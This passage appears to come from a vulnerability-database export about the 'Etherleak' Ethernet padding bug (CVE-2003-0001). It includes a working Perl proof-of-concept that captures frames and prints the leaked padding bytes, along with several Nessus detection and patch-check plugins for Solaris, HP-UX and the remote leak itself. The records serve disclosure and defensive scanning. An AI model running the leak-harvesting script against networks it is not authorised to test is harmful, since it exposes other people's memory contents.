ethernet frame must be padded to reach a specific \n# size or fall on a certain boundary. This task is left up to the driver \n# for the ethernet device. The RFCs state that this padding must consist \n# of NULLs. The bug is that at the time and still to this day, many device \n# drivers do not pad will NULLs, but rather pad with unsanitized portions \n# of kernel memory, oftentimes exposing sensitive information to remote \n# systems or those savvy enough to coerce their targets to do so. \n# \n# Proof of this can be found by googling for 'warchild and etherleak', or \n# by visiting: \n# \n# http://lkml.org/lkml/2002/4/27/101 \n# \n# This was ultimately fixed in the Linux kernel, but over time this \n# vulnerability reared its head numerous times, but at the core the \n# vulnerability was the same as the one I originally published. The most \n# public of these was CVE-2003-0001, which was assigned to address an \n# official @stake advisory. \n# \n# This code can be found its most current form at: \n# \n# http://spoofed.org/files/exploits/etherleak \n# \n# Jon Hart <jhart@spoofed.org>, March 2007 \n# \n \nuse strict; \nuse diagnostics; \nuse warnings; \nuse Getopt::Long; \nuse Net::Pcap; \nuse NetPacket::Ethernet qw(:ALL); \nuse NetPacket::IP qw(:ALL); \n \nmy %opts = (); \nmy ($iface, $err, $pcap_t, $pcap_save, $filter_string); \n \nGetOptions( \\%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or \ndie \"Unknown option: $!\\n\" && &usage(); \n \nif (defined($opts{'help'})) { \n&usage(); \nexit(0); \n} \n \nif (defined($opts{'read'})) { \n$pcap_t = Net::Pcap::open_offline($opts{'read'}, \\$err); \nif (!defined($pcap_t)) { \nprint(\"Net::Pcap::open_offline failed: $err\\n\"); \nexit 1; \n} \n} else { \nif (defined($opts{'interface'})) { \n$iface = $opts{'interface'}; \n} else { \n$iface = Net::Pcap::lookupdev(\\$err); \nif (defined($err)) { \nprint(STDERR \"lookupdev() failed: $err\\n\"); \nexit(1); \n} else { \nprint(STDERR \"No interface specified. Using $iface\\n\"); \n} \n} \n \n$pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \\$err); \nif (!defined($pcap_t)) { \nprint(\"Net::Pcap::open_live failed on $iface: $err\\n\"); \nexit 1; \n} \n} \n \nmy $filter; \nif (Net::Pcap::compile($pcap_t, \\$filter, defined($opts{'filter'}) ? $opts{'filter'} : \"\", 0, 0) == -1) { \nprintf(\"Net::Pcap::compile failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n \nif (Net::Pcap::setfilter($pcap_t, $filter) == -1) { \nprintf(\"Net::Pcap::setfilter failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n \nif (defined($opts{'write'})) { \n$pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'}); \nif (!defined($pcap_save)) { \nprintf(\"Net::Pcap::dump_open failed: %s\\n\", Net::Pcap::geterr($pcap_t)); \nexit(1); \n} \n} \n \nNet::Pcap::loop($pcap_t, -1, \\&process, \"foo\"); \nNet::Pcap::close($pcap_t); \n \nif (defined($opts{'write'})) { \nNet::Pcap::dump_close($pcap_save); \n} \n \n \n \nsub process { \nmy ($user, $hdr, $pkt) = @_; \nmy ($link, $ip); \nmy $jump = 0; \n \nmy $datalink = Net::Pcap::datalink($pcap_t); \nif ($datalink == 1) { $jump += 14; } \nelsif ($datalink == 113) { $jump += 16; } \nelse { printf(\"Skipping datalink $datalink\\n\"); return; } \n \nmy $l2 = NetPacket::Ethernet->decode($pkt); \n \nif ($l2->{type} == ETH_TYPE_IP) { \n$ip = NetPacket::IP->decode(eth_strip($pkt)); \n$jump += $ip->{len}; \n} elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; } \nelse { \n# assume 802.3 ethernet, and just jump ahead the length \nfor ($l2->{dest_mac}) { \nif (/^0180c200/) { \n# spanning tree \n# l2->{type} here will actually be the length. HACK. \n$jump += $l2->{type}; \n} \nelsif (/^01000ccccc/) { \n# CDP/VTP/DTP/PAgP/UDLD/PVST, etc \n# l2->{type} here will actually be the length. HACK. \n$jump += $l2->{type}; \n} elsif (/^ab0000020000/) { \n# DEC-MOP-Remote-Console \nreturn; \n} else { \n# loopback \nif ($l2->{src_mac} eq $l2->{dest_mac}) { return; } \nprintf(\"Skipping datalink $datalink l2 type %s\\n\", $l2->{type}); return; \n} \n} \n} \n \n \nif ($hdr->{len} > $jump) { \nmy $trailer_bin = substr($pkt, $jump); \nmy $trailer_hex = \"\"; \nmy $trailer_ascii = \"\"; \nforeach (split(//, $trailer_bin)) { \n$trailer_hex .= sprintf(\"%02x\", ord($_)); \nif (ord($_) >= 32 && ord($_) <= 126) { \n$trailer_ascii .= $_; \n} else { $trailer_ascii .= \".\"; } \n} \n# ignore all trailers that are just single characters repeated. \n# most OS' use 0, F, 5 or a. \nunless ($trailer_hex =~ /^(0|5|f|a)\\1*$/i) { \nunless ($opts{'quiet'}) { \nprint(\"#\"x80, \"\\n\"); \nprintf(\"%s -> %s\\n\", $l2->{src_mac}, $l2->{dest_mac}); \nif ($l2->{type} == ETH_TYPE_IP) { \nprintf(\"%s -> %s\\n\", $ip->{src_ip}, $ip->{dest_ip}); \n} \n} \nprint(\"$trailer_hex\\t$trailer_ascii\\n\"); \nif (defined($opts{'write'})) { \nNet::Pcap::dump($pcap_save, $hdr, $pkt); \n} \n} \n} \n} \n \nsub usage { \nprint <<EOF; \n$0 -- A demonstration of the infamous 'etherleak' bug. \n \nCVE-2003-0001, and countless repeats of the same vulnerability. \n \nOptions: \n[-h|--help] # this message \n[-i|--interface] <interface> # interface to listen on \n[-f|--filter] <pcap filter> # apply this filter to the traffic \n[-r|--read] <path to pcap> # read from this saved pcap file \n[-w|--write] <path to pcap> # write tothis saved pcap file \n[-q|--quiet] # be quiet \n[-v|--verbose] # be verbose \n \nEOF \n \n \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/55335/etherleak.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2018-09-01T23:33:10", "references": ["https://getupdates.oracle.com/readme/125907-02"], "pluginID": "107944", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.", "edition": 3, "reporter": "Tenable", "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 125907-02", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-03-12T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_125907-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=107944", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107944);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/03/12 17:45:06\");\n\n script_cve_id(\"CVE-2003-0001\");\n\n script_name(english:\"Solaris 10 (x86) : 125907-02\");\n script_summary(english:\"Check for patch 125907-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 125907-02\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: AMD pcnet driver). Supported versions that are\naffected are 10 and 11. Easily exploitable vulnerability allows\nsuccessful unauthenticated network attacks via TCP/IP. Successful\nattack of this vulnerability can result in unauthorized read access to\na subset of Solaris accessible data.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/125907-02\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 125907-02\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"125907-02\", obsoleted_by:\"\", package:\"SUNWos86r\", version:\"11.10.0,REV=2005.01.21.16.34\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWos86r\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:42:09", "references": [], "pluginID": "16926", "description": "s700_800 11.04 (VVOS) EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_29244 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_29244.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16926", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_29244. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16926);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_29244 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.04 (VVOS) EISA 100BT cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_29244 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.04\"))\n{\n exit(0, \"The host is not affected since PHNE_29244 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_29244\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-FMT.100BT-FORMAT\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-KRN.100BT-KRN\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-INIT\", version:\"B.11.04.04\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.01\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.02\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.03\")) flag++;\nif (hpux_check_patch(app:\"100BT-EISA-RUN.100BT-RUN\", version:\"B.11.04.04\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:33:13", "references": [], "pluginID": "16670", "description": "s700_800 11.00 LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-02-16T00:00:00", "title": "HP-UX PHNE_28143 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2013-04-20T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_28143.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16670", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_28143. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(16670);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2013/04/20 00:36:48 $\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_xref(name:\"CERT\", value:\"412115\");\n script_xref(name:\"HP\", value:\"HPSBUX0305\");\n script_xref(name:\"HP\", value:\"SSRT3451\");\n\n script_name(english:\"HP-UX PHNE_28143 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.00 LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for\npadding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_28143 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.00\"))\n{\n exit(0, \"The host is not affected since PHNE_28143 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_28143\", \"PHNE_29530\", \"PHNE_32643\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"Networking.LAN-RUN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.LAN2-KRN\", version:\"B.11.00\")) flag++;\nif (hpux_check_patch(app:\"Networking.NW-ENG-A-MAN\", version:\"B.11.00\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:09:10", "references": ["http://www.nessus.org/u?719c90b4"], "pluginID": "11197", "description": "The remote host uses a network device driver that pads ethernet frames with data which vary from one packet to another, likely taken from kernel memory, system memory allocated to the device driver, or a hardware buffer on its network interface card.\n\nKnown as 'Etherleak', this information disclosure vulnerability may allow an attacker to collect sensitive information from the affected host provided he is on the same physical subnet as that host.", "edition": 4, "reporter": "Tenable", "published": "2003-01-14T00:00:00", "title": "Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-07-10T00:00:00", "cpe": [], "id": "ETHERLEAK.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11197", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11197);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/07/10 14:27:33\");\n\n script_cve_id(\"CVE-2003-0001\");\n script_bugtraq_id(6535);\n\n script_name(english:\"Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)\");\n script_summary(english:\"etherleak check\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host appears to leak memory in network packets.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host uses a network device driver that pads ethernet frames\nwith data which vary from one packet to another, likely taken from\nkernel memory, system memory allocated to the device driver, or a\nhardware buffer on its network interface card.\n\nKnown as 'Etherleak', this information disclosure vulnerability may\nallow an attacker to collect sensitive information from the affected\nhost provided he is on the same physical subnet as that host.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?719c90b4\");\n script_set_attribute(attribute:\"solution\", value:\"Contact the network device driver's vendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"dump.inc\");\ninclude(\"global_settings.inc\");\n\nif ( ! islocalnet() ) exit(0, \"The target must be on the same local subnet as the Nessus server.\");\nif ( TARGET_IS_IPV6 ) exit(0, \"Can't test over IPv6.\");\n\nfunction probe()\n{\n local_var filter, i, icmp, ip, len, rep, str;\n\n ip = forge_ip_packet(ip_p:IPPROTO_ICMP, ip_src:this_host());\n icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq:1, icmp_id:1, data:\"x\");\n\n filter = string(\"icmp and src host \", get_host_ip(), \" and dst host \", this_host());\n\n for(i=0;i<3;i++)\n {\n rep = send_packet(icmp, pcap_filter:filter);\n if(rep)break;\n }\n\n if(rep == NULL)exit(0);\n##dump(dtitle: \"ICMP\", ddata: rep);\n\n len = get_ip_element(ip:rep, element:\"ip_len\");\n if(strlen(rep) > len)\n {\n str=\"\";\n for(i=len;i<strlen(rep);i++)\n {\n str = string(str, rep[i]);\n }\n return(str);\n }\n else return(NULL);\n}\n\nfunction ping()\n{\n local_var filter, i, icmp, ip, rep;\n\n ip = forge_ip_packet(ip_p:IPPROTO_ICMP, ip_src:this_host());\n icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0, icmp_seq:1, icmp_id:1, data:crap(data:\"nessus\", length:254));\n\n filter = string(\"icmp and src host \", get_host_ip(), \" and dst host \", this_host());\n\n for(i=0;i<3;i++) rep = send_packet(icmp, pcap_filter:filter, pcap_timeout:1);\n}\n\nif(islocalhost())exit(0, \"Can't test localhost.\");\n\n\nstr1 = probe();\nping();\nsleep(1);\nstr2 = probe();\n\n##dump(dtitle: \"ether1\", ddata: str1);\n##dump(dtitle: \"ether2\", ddata: str2);\n\nif (isnull(str1) || isnull(str2)) exit(0, \"There was no padding in one or both packets.\");\n\nif (str1 != str2)\n{\n str1_0 = str_replace(find:raw_string(0x00), replace:\"\", string:str1);\n str2_0 = str_replace(find:raw_string(0x00), replace:\"\", string:str2);\n if (strlen(str1_0) == 0 && strlen(str2_0) == 0) exit(0, \"The padding in both packets consists of all NULLs.\");\n\n if (report_verbosity > 0)\n {\n report = '\\n' + 'Padding observed in one frame :' +\n '\\n' +\n '\\n' + ' ' + str_replace(find:'\\n', replace:'\\n ', string:hexdump(ddata:str1)) +\n '\\n' + 'Padding observed in another frame :' +\n '\\n' +\n '\\n' + ' ' + str_replace(find:'\\n', replace:'\\n ', string:hexdump(ddata:str2));\n report = chomp(report) + '\\n';\n security_note(proto:\"icmp\", port:0, extra:report);\n }\n else security_note(proto:\"icmp\", port:0);\n\n set_kb_item(name:\"Host/etherleak\", value:TRUE);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:38:50", "references": ["https://getupdates.oracle.com/readme/125907-02"], "pluginID": "69906", "description": "Vulnerability in the Solaris component of Oracle Sun Systems Products Suite (subcomponent: AMD pcnet driver). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows successful unauthenticated network attacks via TCP/IP. Successful attack of this vulnerability can result in unauthorized read access to a subset of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual 125907 patch-revision plugins, or deemed non-security related.", "edition": 6, "reporter": "Tenable", "published": "2013-09-15T00:00:00", "title": "Solaris 10 (x86) : 125907-02 (deprecated)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Solaris Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0001"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_125907.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69906", "sourceData": "\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69906);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/30 13:40:14\");\n\n script_cve_id(\"CVE-2003-0001\");\n\n script_name(english:\"Solaris 10 (x86) : 125907-02 (deprecated)\");\n script_summary(english:\"Check for patch 125907-02\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Systems Products\nSuite (subcomponent: AMD pcnet driver). Supported versions that are\naffected are 10 and 11. Easily exploitable vulnerability allows\nsuccessful unauthenticated network attacks via TCP/IP. Successful\nattack of this vulnerability can result in unauthorized read access to\na subset of Solaris accessible data.\n\nThis plugin has been deprecated and either replaced with individual\n125907 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/125907-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 125907 instead.\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:49:48", "references": [], "pluginID": "17420", "description": "s700_800 11.04 (VVOS) LAN product cumulative patch : \n\nPotential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.", "edition": 4, "reporter": "Tenable", "published": "2005-03-18T00:00:00", "title": "HP-UX PHNE_29267 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)", "type": "nessus", "enchantments": {"score": {"vector": 